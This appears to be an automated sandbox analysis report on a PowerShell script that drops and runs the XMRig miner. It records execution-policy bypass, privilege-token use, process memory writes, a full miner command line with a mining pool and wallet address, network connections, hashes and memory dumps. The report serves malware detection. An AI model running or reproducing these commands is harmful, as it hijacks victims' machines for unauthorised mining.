| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4872 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4872 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4872-0-0x00007FFF618B3000-0x00007FFF618B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34tm1erx.20x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4872-9-0x0000029DAFBB0000-0x0000029DAFBD2000-memory.dmp
memory/4872-10-0x00007FFF618B0000-0x00007FFF62372000-memory.dmp
memory/4872-11-0x00007FFF618B0000-0x00007FFF62372000-memory.dmp
memory/4872-12-0x00007FFF618B0000-0x00007FFF62372000-memory.dmp
memory/4872-14-0x0000029DAFC50000-0x0000029DAFC62000-memory.dmp
memory/4872-15-0x0000029DAFC40000-0x0000029DAFC4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2440-46-0x000001AB760A0000-0x000001AB760C0000-memory.dmp
memory/2440-47-0x000001AB779A0000-0x000001AB779C0000-memory.dmp
memory/2440-48-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/4872-49-0x00007FFF618B0000-0x00007FFF62372000-memory.dmp
memory/2440-51-0x000001AB779E0000-0x000001AB77A00000-memory.dmp
memory/2440-50-0x000001AB779C0000-0x000001AB779E0000-memory.dmp
memory/4872-53-0x00007FFF618B3000-0x00007FFF618B5000-memory.dmp
memory/2440-52-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-54-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-57-0x000001AB779E0000-0x000001AB77A00000-memory.dmp
memory/2440-56-0x000001AB779C0000-0x000001AB779E0000-memory.dmp
memory/2440-55-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-58-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-59-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-60-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-61-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-62-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-63-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-64-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-65-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-66-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-67-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-68-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-69-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-70-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-71-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-72-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-73-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-74-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-75-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-76-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-77-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-78-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-79-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-80-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-81-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-82-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-83-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-84-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-85-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-86-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-87-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-88-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-89-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-90-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-91-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-92-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-93-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-94-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-95-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-96-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-97-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-98-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-99-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-100-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-101-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-102-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-103-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-104-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-105-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-106-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-107-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-108-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-109-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-110-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-111-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-112-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-113-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-114-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-115-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp
memory/2440-116-0x00007FF6F6340000-0x00007FF6F6F73000-memory.dmp